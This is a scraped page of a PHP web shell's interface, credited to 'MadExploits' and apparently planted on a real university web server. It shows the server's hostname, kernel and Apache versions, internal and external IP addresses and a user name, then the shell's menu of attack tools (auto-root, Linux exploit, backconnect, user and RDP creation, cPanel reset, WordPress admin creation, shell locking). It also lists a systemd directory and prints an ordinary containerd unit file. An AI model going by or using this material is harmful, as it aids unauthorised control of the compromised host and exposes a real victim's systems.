Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 18.222.112.45
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
etc /
systemd /
system /
multi-user.target.wants /
[ HOME SHELL ]
Name
Size
Permission
Action
ModemManager.service
480
B
-rw-r--r--
apache2.service
395
B
-rw-r--r--
atd.service
347
B
-rw-r--r--
console-setup.service
312
B
-rw-r--r--
containerd.service
1.39
KB
-rw-r--r--
cron.service
316
B
-rw-r--r--
dmesg.service
358
B
-rw-r--r--
docker.service
1.67
KB
-rw-r--r--
grub-common.service
583
B
-rw-r--r--
grub-initrd-fallback.service
408
B
-rw-r--r--
irqbalance.service
454
B
-rw-r--r--
lxd-agent-9p.service
489
B
-rw-r--r--
lxd-agent.service
498
B
-rw-r--r--
mysql.service
529
B
-rw-r--r--
networkd-dispatcher.service
258
B
-rw-r--r--
nfs-client.target
272
B
-rw-r--r--
ondemand.service
362
B
-rw-r--r--
open-vm-tools.service
489
B
-rw-r--r--
pollinate.service
404
B
-rw-r--r--
remote-fs.target
522
B
-rw-r--r--
rpcbind.service
626
B
-rw-r--r--
rsync.service
255
B
-rw-r--r--
rsyslog.service
435
B
-rw-r--r--
secureboot-db.service
604
B
-rw-r--r--
snap-core20-2318.mount
326
B
-rw-r--r--
snap-core20-2434.mount
326
B
-rw-r--r--
snap-lxd-24061.mount
320
B
-rw-r--r--
snap-lxd-29619.mount
320
B
-rw-r--r--
snap-snapd-23258.mount
326
B
-rw-r--r--
snap-snapd-23545.mount
326
B
-rw-r--r--
snap.lxd.activate.service
467
B
-rw-r--r--
snapd.apparmor.service
1.27
KB
-rw-r--r--
snapd.autoimport.service
487
B
-rw-r--r--
snapd.core-fixup.service
369
B
-rw-r--r--
snapd.recovery-chooser-trigger...
550
B
-rw-r--r--
snapd.seeded.service
308
B
-rw-r--r--
snapd.service
750
B
-rw-r--r--
ssh.service
538
B
-rw-r--r--
systemd-networkd.service
1.95
KB
-rw-r--r--
systemd-resolved.service
1.69
KB
-rw-r--r--
thermald.service
290
B
-rw-r--r--
ua-reboot-cmds.service
830
B
-rw-r--r--
ubuntu-advantage.service
1.53
KB
-rw-r--r--
ufw.service
266
B
-rw-r--r--
unattended-upgrades.service
377
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : containerd.service
# Copyright The containerd Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. [Unit] Description=containerd container runtime Documentation=https://containerd.io After=network.target local-fs.target dbus.service [Service] #uncomment to enable the experimental sbservice (sandboxed) version of containerd/cri integration #Environment="ENABLE_CRI_SANDBOXES=sandboxed" ExecStartPre=-/sbin/modprobe overlay ExecStart=/usr/bin/containerd Type=notify Delegate=yes KillMode=process Restart=always RestartSec=5 # Having non-zero Limit*s causes performance problems due to accounting overhead # in the kernel. We recommend using cgroups to do container-local accounting. LimitNPROC=infinity LimitCORE=infinity LimitNOFILE=infinity # Comment TasksMax if your systemd version does not supports it. # Only systemd 226 and above support this version. TasksMax=infinity OOMScoreAdjust=-999 [Install] WantedBy=multi-user.target
Close